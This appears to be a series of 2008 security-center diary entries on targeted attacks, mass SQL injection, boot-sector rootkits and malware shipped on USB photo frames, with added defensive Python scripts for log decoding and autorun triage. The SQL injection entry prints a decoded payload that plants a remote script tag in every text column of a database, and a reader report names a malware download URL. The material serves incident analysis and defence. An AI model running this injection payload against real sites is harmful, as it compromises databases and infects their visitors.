  • Control servers used in the attack are generally compromised boxes themselves. The connection occurs based on a DNS lookup, not an IP address. This allows the attackers to reuse an infected machine even when the original control server is cleaned by its owners. These control servers sometimes contain port forwarders connecting to another machine, often in a different jurisdiction;
  • Initially, attacks were disabled and enabled remotely by "parking" the control hostname to localhost ( As this is a bit obvious, newer code contains checks for specific, fake IP addresses upon which the attack is temporarily disabled. Parking addresses are generally easy to spot manually, such as;
  • Hostnames are reused over several months but appear to be target-specific, while compromised IP addresses are potentially shared between targets;
  • "Memes", such as funny documents that are distributed on mailing lists, are sometimes redistributed by attackers, but containing malicious code. Users are familiar with the document being sent to them and are likely to open it.
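The "parking" and hostname-reuse observations in the list above lend themselves to a simple analyst script. The following is an added example, not code from the presentation or the diary: given a set of (date, hostname, resolved address) records, it marks the dates on which a control hostname was parked on an address no real server could answer on (loopback, unspecified, link-local, multicast or RFC 1918 space), tracks how long each hostname stayed in use, and reports live addresses seen behind more than one hostname. The hostnames, addresses and dates are constructed, and grouping resolution records per hostname is an assumption about how one would track this.

```python
import ipaddress
from collections import defaultdict

# Constructed resolution observations (date seen, hostname, resolved address).
# None of these names or addresses come from the diary; 192.0.2.0/24 and
# 198.51.100.0/24 are documentation ranges standing in for compromised hosts.
OBSERVATIONS = [
    ("2007-09-03", "update.example-c2.test", "192.0.2.44"),
    ("2007-10-11", "update.example-c2.test", "127.0.0.1"),
    ("2007-11-20", "update.example-c2.test", "192.0.2.44"),
    ("2007-12-15", "update.example-c2.test", "0.0.0.0"),
    ("2008-01-04", "update.example-c2.test", "198.51.100.9"),
    ("2007-12-01", "files.other-target.test", "192.0.2.44"),
]

# RFC 1918 ranges listed explicitly: ipaddress.is_private also covers the
# documentation ranges used above, which we want to treat as "live" here.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def classify_address(ip_text):
    """'parked' for addresses a control server could never answer on, else 'live'."""
    ip = ipaddress.ip_address(ip_text)
    if ip.is_loopback or ip.is_unspecified or ip.is_link_local or ip.is_multicast:
        return "parked"
    if ip.version == 4 and any(ip in net for net in RFC1918):
        return "parked"
    return "live"


def summarize(observations):
    """Per hostname: first/last date seen, live addresses used, and dates it was parked."""
    by_host = defaultdict(lambda: {"first": None, "last": None, "live_ips": set(), "parked_on": []})
    for date, host, ip in sorted(observations):  # ISO dates sort chronologically as strings
        rec = by_host[host]
        rec["first"] = rec["first"] or date
        rec["last"] = date
        if classify_address(ip) == "parked":
            rec["parked_on"].append(date)
        else:
            rec["live_ips"].add(ip)
    return dict(by_host)


def shared_infrastructure(summary):
    """Live addresses that sat behind more than one hostname (shared between targets)."""
    ip_hosts = defaultdict(set)
    for host, rec in summary.items():
        for ip in rec["live_ips"]:
            ip_hosts[ip].add(host)
    return {ip: sorted(hosts) for ip, hosts in ip_hosts.items() if len(hosts) > 1}


if __name__ == "__main__":
    summary = summarize(OBSERVATIONS)
    for host, rec in summary.items():
        print(host, rec["first"], "->", rec["last"], "parked on", rec["parked_on"])
    print("shared:", shared_infrastructure(summary))
```

The useful output is the combination: a hostname that lives for months, alternates between one or two real addresses and a loopback "parking" address, and shares an address with a hostname seen at another organisation is exactly the profile the list above describes.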

A number of people approached me afterwards telling me that most of what they learned about the issue so far came from the media, not from their peers. When I started studying the phenomenon, my approach was to contact groups that had reported very similar attacks, such as the Falun Gong community. Information and samples from these groups allowed me to gain a better understanding of the attacks. 

Targeted attacks evolve based on economies built around the information that is targeted. When information is valuable to the attacker, he will take commensurate effort to compromise it. Depending on the value, this encourages the use of novel, untested techniques. Such techniques tend to be unreliable and fail disproportionately. Failures can be detected, understood and shared. This type of sharing is part of what I refer to as security intelligence.

If you’re worried about this type of compromise, join one of the many information sharing mechanisms your industry may offer: the United States has a fair amount of ISACs (Information Sharing and Analysis Centers), and the UK offers its WARPs (Warning, Advice and Reporting Points). These organizations allow you to share information and still rest assured it is anonymized appropriately.

We are also very interested in hearing about your experiences. The Storm Center takes your confidentiality very seriously, so please do identify what we can post and what should remain private or be referred to only as generic techniques. We appreciate your contribution.

You can download the CCC presentation here or read up on the issue further here.

Maarten Van Horenbeeck


Published: 2008-01-14

Mass Web Infections

One of our readers, Peter, asked us to post a Register article for comments.


It would appear that two different web infections are moving around the Internet.   One is about 15% of ScanSafe's traffic, the other only 1%.  The 15% represents e-commerce websites hosting the infections and passing them on to visitors.

The 1% traffic is significantly more interesting as it appears to be intelligent enough to produce a randomly generated file name each time the person visits the site.  It is this fluxing which is causing so much discomfort with Incident Handlers worldwide.

If you have any info regarding these mass infections, please let us know here.

Fair Winds,

Mari Nichols


Published: 2008-01-12

Patchlink Issue

One of our readers has sent us an issue with Patchlink on his Windows servers.

Some of the services on a server stop responding, although the server can still be reached via ping and remote desktop. The server would always log a 5719 error with a "Not enough storage" description. 

After much troubleshooting, he discovered that the issue is caused by the gravitix executable, which is part of the Patchlink client: it was consuming ~15,000 TCP handles.

The reader found from the support site that this is indeed an issue (Answer ID 525):
"Agents/computers may go offline after extended periods without PatchLink Update Service being restarted; handle count exceeds 12,000 on gravitixservice.exe."

Unfortunately, the extended period is unclear since the server has been rebooted less than a month ago.

Thanks to our reader for sharing this. If you face a similar issue and are running Patchlink on your servers, you may want to check this out first. Do drop us a note if this is a real case for you.


We have been informed that an official fix for this has now been released. QFE agent/client package version 253 will apparently fix this issue.


Published: 2008-01-12

Sun Java SE 6 Update 4 has been released

Sun Java SE 6 Update 4 has been released. From the release notes, it contains more than 370 bug fixes.

For end users, you may want to update your Java JRE to v1.6.0_04 soon.



Published: 2008-01-11

Java.ByteVerify exploit

Come April, we will reach the FIFTH anniversary of the ByteVerify vulnerability (MS03-011). Untangling some seriously obfuscated JavaScript coming from a couple of web sites in China earlier today, I ended up with - yes, a ByteVerify exploit. Also in the package was an MDAC exploit (MS06-014), whose second anniversary will be up this April as well.

To see these exploits still in use can only mean one thing: They still work.

And they seem to work well enough that the bad guys can instead sink their time into developing new obfuscation techniques and other ways to make analysis more difficult -- only to deliver a five year old exploit in the end. Not a very stellar testament to patching efforts.



Published: 2008-01-09

Mass exploits with SQL Injection

A couple of days ago fellow handler Scott wrote a diary about sites hosting exploits for various Realplayer vulnerabilities. One of the malicious sites mentioned in the article, uc8010.com, looked particularly interesting. When you search for this web site in Google you get thousands of other, compromised sites that are all pointing to the uc8010.com web site. This, obviously, sparked some interest in the security community so we decided to dig a bit further into this attack.

It turned out that there is an automated script or a bot performing SQL injection attacks against vulnerable web applications. I remembered that I saw the very same attack appearing back in November last year but it was not this widespread – it appears that the attacker improved the crawling/attacking function of his bot so he managed to compromise more web sites.

The attack back from November 2007 was almost exactly the same as the current one, but the SQL statement appears to be a bit improved. One of the logs that we received back in November is shown below:

GET /home/site_content_3.asp


As you can see, we can't tell much about what's going on here. The attackers were smart and decided to obfuscate the attack by using the CAST statement. The CAST statement explicitly converts one data type to another. So, the attackers CAST the big input value into "@S" and then execute it. In this example, the site_content_3.asp script is vulnerable to SQL injection (notice the ' character after s=290, which is an input parameter for the site_content_3.asp script).

Back to the CAST statement. We can decode this simply with perl, we just need to copy the CAST content into a separate line and do something like this:

$ perl -pe 's/(..)00/chr(hex($1))/ge' < input > output

The output file will contain the decoded SQL statement:

declare @m varchar(8000);set @m='';select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';'
from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';
set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);set @m=REVERSE(@m);exec(@m);

And here we can see exactly what's going on. This SQL statement takes all rows from the sysobjects table with type U (user table). It then cycles through those objects and matches the columns of type "varchar". Finally, for every such column it executes an update statement which results in appending the code shown above pointing to the yl18.net site.
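As an added example (not code from the diary), here is a Python version of the decoding step above, generalised into a small log-scanning routine: it URL-decodes each request, pulls out every CAST(0x... AS VARCHAR) payload, decodes it both the way the Perl one-liner does and as proper UTF-16LE (two bytes per character, low byte first, which is what the "XX00" pattern reflects), and flags decoded statements that touch sysobjects/syscolumns or call exec. The log lines, the encoded statement and the fragment list are constructed for the example; the hex is produced by encoding a harmless statement so the decoders can be checked against a known answer.

```python
import re
import urllib.parse

# Fragments whose presence in a decoded statement is worth an alert; chosen from the
# pieces of the decoded payload shown in the diary (constructed list, tune to taste).
SUSPICIOUS_FRAGMENTS = ("sysobjects", "syscolumns", "exec(", "<script", "update[")

# CAST(0x<hex> AS VARCHAR/NVARCHAR ...) as it appears once the query string is URL-decoded.
CAST_HEX_RE = re.compile(r"CAST\(\s*0x([0-9a-fA-F]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)


def decode_perl_style(hexstr):
    """Mirror of the diary's one-liner s/(..)00/chr(hex($1))/ge:
    every 'XX00' group becomes the character with code 0xXX."""
    return re.sub(r"(..)00", lambda m: chr(int(m.group(1), 16)), hexstr)


def decode_utf16le(hexstr):
    """The same decoding done with the codec the bytes really are in (UTF-16LE).
    Unlike the regex this also survives non-ASCII characters in the payload."""
    if len(hexstr) % 4:
        raise ValueError("hex payload is not a whole number of 16-bit units")
    return bytes.fromhex(hexstr).decode("utf-16-le")


def extract_cast_payloads(request):
    """All hex payloads inside CAST(0x... AS VARCHAR) in a URL-encoded request."""
    return CAST_HEX_RE.findall(urllib.parse.unquote_plus(request))


def inspect_request(request):
    """Decode every CAST payload in the request and note suspicious fragments."""
    findings = {"payloads": [], "fragments": []}
    for hexpayload in extract_cast_payloads(request):
        try:
            stmt = decode_utf16le(hexpayload)
        except (ValueError, UnicodeDecodeError):
            stmt = decode_perl_style(hexpayload)  # best effort on a damaged payload
        findings["payloads"].append(stmt)
        lowered = stmt.lower()
        findings["fragments"].extend(f for f in SUSPICIOUS_FRAGMENTS if f in lowered)
    return findings


def scan_log(lines):
    """Run inspect_request over 'METHOD PATH STATUS' log lines; return the flagged ones."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        result = inspect_request(parts[1])
        if result["payloads"]:
            hits.append((parts[1][:60], result))
    return hits


# Constructed sample: a harmless statement encoded the way the diary describes
# (UTF-16LE rendered as hex), so the decoders can be checked against a known answer.
SAMPLE_STATEMENT = "declare @m varchar(8000);select name from dbo.sysobjects where xtype='U';exec('select 1');"
SAMPLE_HEX = SAMPLE_STATEMENT.encode("utf-16-le").hex()

# Constructed log lines (not from the page): a normal request, then one that closes the
# s= parameter's quote and carries the obfuscated statement, as in the diary's November log.
SAMPLE_LOG = [
    "GET /home/site_content_3.asp?s=290 200",
    "GET /home/site_content_3.asp?s=290';DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_HEX
    + "%20AS%20VARCHAR(4000));EXEC(@S);-- 200",
]

if __name__ == "__main__":
    for path, result in scan_log(SAMPLE_LOG):
        print(path, "->", result["fragments"])
        for stmt in result["payloads"]:
            print("   ", stmt)
```

Matching on the decoded statement rather than on the literal "CAST" is the point: the diary warns that blocking on CAST alone is easy to evade, while the system tables a mass-update has to enumerate are much harder for the attacker to rename.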

The attack with the uc8010.com site was practically the same with a bit better SQL – Ryan Barnett posted an example of this attack at http://www.modsecurity.org/blog/

As some people noticed, almost all affected web sites are running IIS and MS SQL server. This makes sense since the SQL statement in the attack will work only on MS SQL servers and there aren't that many web sites running Apache on Windows. That being said, I have no doubt that the bad guys will expand their bot (if they haven't already) so it starts attacking PHP+MySQL web sites.

This is another example that points to issues with development of web applications (see the OWASP top ten vulnerability list for 2007 – injection flaws are in second place http://www.owasp.org/index.php/Top_10_2007-A2#Protection). One could also protect against attacks such as this one with a reverse proxy/web application firewall in front of the web server. However, be aware that this is just a temporary fix – as we saw in this example the bad guys are pretty good at evading detection, as they did with the CAST statement (sure, you can block on CAST but be aware that there are other obfuscation ways).




Published: 2008-01-08

Master Boot Record rootkit

Matt Richard from Verisign sent us some information regarding the Master Boot Record (MBR) rootkit that's been found in the wild in the past weeks.

The first interesting part is the timeline:

The next big thing is that those distributing this rootkit, also distribute the Torpig banking Trojan.

The rootkit is currently being installed through a set of relatively old, and easy to patch Microsoft vulnerabilities:

  • Microsoft JVM ByteVerify (MS03-011)
  • Microsoft MDAC (MS06-014) (two versions)
  • Microsoft Internet Explorer Vector Markup Language (MS06-055)
  • Microsoft XML CoreServices (MS06-071)

But that can change at any moment to something more recent.

The different files involved had rather spurious detection in the anti-virus world.

Swa Frantzen -- Gorilla Security


Published: 2008-01-08

January Black Tuesday overview

Overview of the January 2008 Microsoft patches and their status.

#                    Affected       Contra Indications   Known Exploits               Microsoft rating   ISC rating(*)
                                                                                                        clients    servers
MS08-001             TCP/IP stack   -                    No publicly known exploits   Critical           Critical   Critical
  Multiple vulnerabilities in the TCP/IP stack lead to arbitrary code execution and denial of service.
  Replaces MS06-032
  KB 941644
MS08-002             LSASS          -                    No publicly known exploits   Important          Important  Important
  Input validation errors in Local Security Authority Subsystem Service (LSASS) lead to local exploitation and privilege escalation.
  KB 943485


We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.


Swa Frantzen -- Gorilla Security


Published: 2008-01-07

Digital Hitchhikers Part Three

Back on Christmas Day we published a diary about digital picture frames being purchased with malware installed on the built-in memory.  Last Friday we did a follow-up diary after two more readers wrote to tell us that they also purchased malware-infected photo frames.  In the second diary we asked readers to check any recently purchased devices that connect to a user's computer via a USB cable and appear to the operating system as a mounted drive.  In years past this would have been limited to iPods and USB memory sticks but now it includes digital photo frames, GPS devices, external hard drives, and of course digital cameras.

Several readers wrote back with their findings and here's what they told us.

A reader who asked to remain anonymous said:  

I got bought a set of MP3 playing sunglasses for Christmas that came with an extra gift, infection, AVG called it PSW.OnlineGames. It was a hidden .scr file with a hidden Autorun.inf file .. Can't remember the name of the file or who sold it off-hand though since I'm not near my Inbox..

I got in contact with the company that sold the device and they responded and investigated very quickly.. Seems something went wrong in China during Quality Control checks..

Seems that the Christmas rush is a logical time to distribute infected devices.. Everyone'll be so keen to plug them in and go, and those who run unprotected get it good.

Reader Paul said:

The diary entries discussing the malware on digital photo frames and GPS units have been interesting and informative, but I believe that they have neglected to mention mitigation. In the cases mentioned with any detail, the infection was started when autorun.inf launched a trojan exe file. The key bit of information I believe should be included in a subsequent update is that infection can be prevented by disabling the autorun feature in Windows.

Paul (and others), see this timely article on Microsoft's TechNet about a technique known as Island Hopping.  While the article focuses on USB memory sticks and media you get at trade booths, the defensive measures are applicable to protecting Windows from any external device that mounts as a drive.
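To show from the defender's side what Paul's note describes, here is an added Python example (not code from the diary or from any reader) that parses an autorun.inf and lists the programs it would launch, so a freshly unpacked device can be triaged before autorun ever gets a chance to run anything. The file contents and the filename in them are constructed for the example; the key names it looks for (open, shellexecute, shell\verb\command) are the standard autorun.inf launch keys.

```python
# Constructed autorun.inf contents, modelled on the reader reports above (a hidden
# executable launched via the [autorun] section). The filename is made up.
SAMPLE_AUTORUN = """[autorun]
; comment lines start with a semicolon
open=sample.scr
shellexecute=sample.scr
shell\\open\\Command=sample.scr
shell\\open=Open
icon=frame.ico
"""

# Extensions that mean "this will execute code", not "this will show a picture".
LAUNCH_EXTENSIONS = (".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".vbs", ".js")


def parse_autorun(text):
    """Return {section: {key: value}} for an autorun.inf; keys lower-cased, ';' comments dropped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_targets(sections):
    """Every command an [autorun] section can run: open=, shellexecute=, shell\\<verb>\\command=."""
    auto = sections.get("autorun", {})
    targets = []
    for key, value in auto.items():
        if key in ("open", "shellexecute") or (key.startswith("shell\\") and key.endswith("\\command")):
            targets.append((key, value))
    return targets


def suspicious_launches(sections):
    """Launch targets that are executables or scripts; on a photo frame or MP3 player
    there is no legitimate reason for any of these to be present."""
    out = []
    for key, value in launch_targets(sections):
        words = value.split()
        program = words[0].strip('"') if words else value  # drop arguments such as /quiet
        if program.lower().endswith(LAUNCH_EXTENSIONS):
            out.append((key, program))
    return out


if __name__ == "__main__":
    for key, program in suspicious_launches(parse_autorun(SAMPLE_AUTORUN)):
        print("autorun would run:", program, "(via", key + ")")
```

Run it against the root of the mounted device before anything else; disabling autorun, as Paul suggests, is still the control that stops the launch in the first place, and this only tells you what would have happened.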

Josef sent us this note: 

I am currently working on an Incident within my company that seems to show obvious similarities with your Photo Frame malware incidents:

A virus that copies itself to all partitions (also removables) and writes itself to the AUTORUN.INF

If it is truly connected to your incidents, your AUTORUN.INF files should show the following lines:


It also tries to update itself from a website (www.max-gate.com/backup/mitm.com), connects to an IRC server and tries to spread via NetBIOS.

Reader David sent us this good advice: 

I just wanted to mention that if a malicious program locks down certain features of your operating system, it may still be possible to load an alternate OS (e.g. Knoppix) off CD and delete the offending content.  I believe the latest Linux tools can interact with a fair degree of safety with NTFS formatted systems.

Many users may be unaware of this option, so I just thought it might be worth noting.

Reader Craig pointed out the obvious question:  was the item "new" or had it been returned and resold: 

One fact that seems to be omitted from most of the reports I hear about picture frames, CF storage, MP3 Players, etc that show up with either a virus or porn on them is this: Whether the packages were sealed when the item was purchased.

One of my students (who works at a large electronics store) has mentioned that it seems to be a common prank.  He has seen cases where people have bought a device, loaded stuff on it, and then returned it.   And if they tell the customer representative that there was nothing wrong with the device, that they just changed their mind, often the device ends up right back out on the shelves with the new devices.  He told me that employees are not instructed or required to wipe content off the storage device before reselling the item or putting it back on the shelves.

Craig, as far as we know all of the cases were with "new" items - but to be fair, many stores will re-shrinkwrap returned items if the customer tells the return personnel that they brought it back because they didn't want it (rather than it being defective.)  That opens up the opportunity for somebody to buy an item, bring it home, load malware, then return it to the store where it might get resold.

Reader Dave did the right thing when he brought his infected drive back: 

I purchased a 250GB Maxtor External One Touch Backup from Radio Shack (sale item!) and though it was shrink-wrapped, it caused my Mcafee AV to throttle up on two systems, and blue screen one of them. 

I exchanged it, and the new unit has worked perfectly. I did enclose a note with the drive, and had the sales clerk write "DO NOT RESELL - DEFECTIVE" all over the box.

Handler Scott Fendley provided this little vignette: 

I heard of a story in Colorado where an MP3 player had been purchased for Christmas which contained XXX stuff on it.  So it appears that this is truly a new prank that retailers are going to have to address.

Finally, SANS ISC Handler Daniel Weseman went back through his case logs for the past several weeks and found a couple of reports from his office:  

We had one case of  a "picture frame" on December 12. Symantec AV triggered on "autorun.inf" and flagged it as "Trojan Horse", so it was probably the Silly worm. On the "what happened" self declaration form, the user stated that he had gotten the picture frame at a christmas raffle of his sports club .. no telling if it was Wal-Mart. I followed up, the user doesn't have it anymore, after our IT support cleaned it and gave it back to the user, the user apparently got rid of it right at the next raffle he went to :)

We had one case of GPS on Dec 20, a Garmin Nuvi, but this wasn't straight out of the box and had been attached to the user's home PC prior.  At least this is what the case log indicates ("user copied MP3 files onto the nuvi at home")

Daniel's analysis of these two cases is that unless somebody has a virus alert right after unpacking a device and plugging it in for the very first time, chances are they picked the baddies up somewhere else.

Readers, if you find any more infections - particularly digital photo frames - please let us know via our contact form.  Tell us the name of the device, where you bought it, and what day.  With your permission we'll pass the information along to the equipment manufacturer or to the store's computer security response team.

Marcus H. Sachs
Director, SANS Internet Storm Center



Published: 2008-01-06

Tools for the Home User

Since Christmas has come and gone, I'm sure we have many more new computers that have made their debut on the internet.  I have gotten asked over and over again by friends and family what they can do to make their home system or small home office more safe and to be aware of what is happening. 

In light of this, I thought a diary might be the way to go in order to solicit and compile an updated list of good tools that folks can put to good use.  If you have something that you use or have used that you think would be worthy of mentioning, please drop us a line and I'll compile a list. 

To start things off, I wanted to point to a tool called PacketProtector that was recently featured on Linux.com and provides some nice features for protecting your wireless home network.  PacketProtector is a Linux distribution for your wireless router.  Here is a list of the features that you get according to their website:

--a stateful firewall (iptables)
--WPA/WPA2 Enterprise wireless (802.1X and PEAP with FreeRADIUS)
--intrusion prevention (Snort-inline)
--remote access VPN (OpenVPN)
--content filtering/parental controls (DansGuardian)
--web antivirus (DG + ClamAV)
--a local certificate authority (OpenSSL)
--secure management interfaces (SSH and HTTPS)
--advanced firewall scripts for blocking IM and P2P apps
--IP spoofing prevention (Linux rp_filter)
--basic protocol anomaly detection (ipt_unclean)

This is a nice addition without having to add any other computers to your network if you don't want/need to.  If you have tried it (I haven't as of yet but I hope to do so in the very near future), please let me know your thoughts such as ease of use etc.  I'll try to compile that as well.


Published: 2008-01-06

Solution: Christmas Packet Challenge

I want to thank everyone for the responses to the Christmas Packet Challenge.  I'm glad everyone enjoyed them.  I sincerely hope to do more of these this year if time permits. I learned a lot from the responses myself, such as that there are different versions of the story "A Christmas Carol" and that the questions required Google and Wikipedia searches for folks who are not from the US:>) I want to post the solution to the challenge and then post the names of those who submitted correct answers. Many folks chose not to have their names listed. If I missed someone, please accept my apologies and drop me a line.  I'll update the list!  Thanks again for playing and I hope everyone has a wonderful new year!!

The starter packet contained the following Base64 encoded question:

In the movie A Christmas Carol, how many night(s) did the three spirits come to visit?
The Answer was 1 night so the next question is in Packet 1 of the xmas_challenge_2007.pcap

Here are the rest of the questions and answers to the challenge:

**All I want for Christmas is my ____ Front Teeth.  Answer is 2 so the next question is in Packet 2
**How many reindeer have names that begin with the letter "D"?  Answer is 3 so the next question is in Packet 3
**How many reindeer pull Santa's sleigh?  Answer is 9 so the next question is in Packet 9 (Yes I counted Rudolph)
**How many pipers piping did my true love give to me?  Answer is 11 so the next question is in Packet 11
**How many days in the song the ___ Days of Christmas?  Answer is 12 so the next question is in Packet 12
**Of the 365 days in year, what number is Christmas Day?  Answer is 359 so the next question starts in Packet 359 and continues through packet 365 for the message from the handlers (Only a couple of folks pointed out that I had the flags set  to match the holiday spirit of things i.e. xmas tree:>)  Also this data was not Base64 encoded but rather required a conversion from ASCII Decimal to get:

We wish you a Merry Christmas,
We wish you a Merry Christmas,
We wish you a Merry Christmas and a Happy New Year!!!


Thanks again to ALL those who submitted the correct answers!  Till next time...

Clif Bratcher
Kenny Long and Michael Brown
Chris Rohlf
Charles Hamby
Brandon Applegate
Faisal Sehbai
Matt Johnson
Vikas Taneja
John Mark
Stefan Ford
Peter Abromitis
Andre DiMino
CS Lee and Hazrul Hamzah
Joseph Kern
Eric Paynter and wife
Matt Carlson
Christian Gueco
Dan Roberts
Eduardo Tongson
Mario De Tore
Stéphane Adamiak
Morgan Bailey


Published: 2008-01-05

New resource for Reverse Engineering

dELTA wrote to tell us about the release of "The Collaborative RCE Tool Library" which he explains as:
"In very few words, the design goal of this project is to leverage the advantages of the wiki architecture, where everybody can contribute, while at the same time ditching all the disadvantages of the wiki architecture, add just enough moderation, and finally bring the world one step closer to the nirvana of the semantic web."


The site is very cool and worth checking out. We're also looking forward to the library of infosec tools that he says is going to be his project for 2008.


Published: 2008-01-04

Realplayer Vulnerability

Good morning everyone,

Earlier this week, Evgeny Legerov reported a vulnerability involving Real Player which could allow an attacker to execute code on victim computers. At this moment in time, there is no patch or other work around for this vulnerability though I would expect that limiting end-user privileges would limit the potential risk.

Until an update is available, I recommend that you limit viewing multimedia content using Real Player.  It would be worthwhile to plan to add this future update into the mix with any operating system updates which are scheduled to be released soon.

For more information on this vulnerability, please see:



Published: 2008-01-04

Digital Hitchhikers Part Two

Several days ago David Goldsmith posted a diary concerning a digital photo frame that came with a value added feature.  Since then, two more readers have sent us notes concerning malware on digital photo frames that were purchased or received as Christmas presents last week.  We've been in contact with the security team of the retail store chain where they were purchased as well as the product vendor and both swear that no malware is on the units they are selling.

So, dear readers, here is your first project for the New Year.  If you either purchased or were given a digital photo frame, GPS unit for your car, external hard drive, or any other device that connects to your computer via a USB cable and appears to your operating system as one or more mounted drives, please let us know via our contact form if you experienced any suspicious behavior that smells like malware.  To give you an idea of what we are talking about, here are edited excerpts from the three notes we have received so far:

First notification. 

Behavior after attaching the USB digital photo frame to the PC:

1. MSCONFIG would not run - it would briefly open and then terminate

2. Blue screen when starting in safe mode

3. Many antivirus websites would result in browser terminating

4. Various popups for random name.exe "not valid image messages"

Using the CA AV2008 product, a new aggressive virus named Win/32Mocmex.AM was found on the photo frame (filename: kwjkpww.exe ). No detailed info on it is listed yet in their database.  (More information was later available at http://www.prevx.com/filenames/394470622808329496-0/KAWDHZY.DLL.html.)

Second notification.

The attached file is from a digital picture frame. This file was originally named "autorun.inf", was marked as a hidden, system file, and was located along-side the sample pictures shipped with the picture frame.  The program file launched by this autorun was deleted, but is a variant of the trojan Win32/Agent virus. This file was also marked as hidden.

It did appear all seals were intact and the product was carefully wrapped when it was unpacked. However, I can't say for sure that this frame was not a victim of a prior connection.
The virus scanner I'm using tagged the virus .exe file "cfhskjn.exe" as shown in this log entry:

Threat Name:
Detection Date and Time: 1/1/2008 4:23 PM
File Name:
Threat Severity:
Threat Category:
Threat found by On Demand Scan:
Threat Status:
so I'm thinking it was not the autorun.inf worm or "silly worm" as described in this link. Although I've not dug into this particular .exe code that was found on this frame, the classification as a Win32/Agent threat tells me it is not of a worm (self-propagating) type and behaves more as a Trojan threat.
Google-ing the name of the virus executable turns up three Chinese-language links. Using the Google-translate function, you get this web page from the first link:
which tells me this virus has been in circulation since at least Oct 30 of 2007.

Third notification.

I too connected a digital picture frame to my computer and received the nastiest virus that I've ever encountered in my 20 plus year I/T career. The product vendor tells me it's not true however I know exactly what, how and when. The virus absolutely came from the frame. Is there any way to corroborate this?

This virus was indeed on the frame. It propagates to any connected device by copying a script, a com file and an autorun file. It hides all systems files and itself while completely eliminating the user admin ability to show hidden files. It creates processes that negate any attempt to go to anti virus and anti spam web sites. It prevents the remote installation of any anti virus components. I was able to remove it by using the attrib command to unhide then delete the files, then run Symantec anti virus. I also manually deleted the files from my USB drive and flash drive that I used to back up my data. I then had to long format and rebuild my computer because I had no trust that it was safe.

I was using my computer the morning that it crashed without any troubles at all. I used webmail and VPN-connected to my business network, which is FDA regulatory compliant and very secure. When I completed my work I then connected the picture frame and my system immediately went crazy. After this happened I ceased to use my system and went to a second computer, where I found your publication, which reinforced my immediate conclusion.
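The reports above describe the classic removable-media worm pattern: an autorun.inf at the root of the volume points Windows at a dropped payload, so the malware runs as soon as the frame or USB stick is opened. As an added example (not code from the diary or from any of the readers), here is a small Python check that parses an autorun.inf, pulls out every directive that can launch a program (open=, shellexecute= and the shell\<verb>\command= entries that hijack Explorer's Open/Explore context-menu verbs) and reports whether each referenced file is actually present on the volume. The sample autorun.inf and the file names in it (system.com, update.exe) are constructed for this demonstration.

```python
"""Spot an autorun.inf that launches a payload on a mounted volume.

Added example for the ISC diary on malware shipped on digital picture
frames; the sample autorun.inf and its file names are constructed.
"""
import os
import shutil
import tempfile

# [autorun] keys that make Windows (with AutoPlay/AutoRun enabled) launch a
# program when the volume is mounted or opened from Explorer.
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text):
    """Return {directive: command line} for every launch directive in an
    autorun.inf. Covers open= and shellexecute= plus the
    shell\\<verb>\\command= entries worms use to hijack the Explorer
    "Open"/"Explore" context-menu verbs. Non-launch keys (icon=, label=)
    are ignored. Section and key matching is case-insensitive."""
    directives = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):        # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower().startswith("autorun")
            continue
        if not in_autorun or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        key = key.lower()
        if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            directives[key] = value
    return directives


def launch_target(command):
    """Program the command line starts: the first token, quotes stripped."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(None, 1)[0] if command else ""


def scan_volume(root):
    """Look for autorun.inf at the root of a mounted volume and report each
    launch directive as (directive, target, target_exists_on_volume).
    A target that does not exist where the directive says it is usually
    worth a closer look: the payload may sit in a hidden/system directory."""
    inf_path = os.path.join(root, "autorun.inf")
    if not os.path.isfile(inf_path):
        return []
    with open(inf_path, encoding="latin-1") as fh:
        directives = parse_autorun(fh.read())
    findings = []
    for key, command in directives.items():
        target = launch_target(command)
        rel = target.replace("\\", os.sep).lstrip(os.sep)   # paths are volume-relative
        if rel.startswith("." + os.sep):
            rel = rel[2:]
        findings.append((key, target, os.path.isfile(os.path.join(root, rel))))
    return findings


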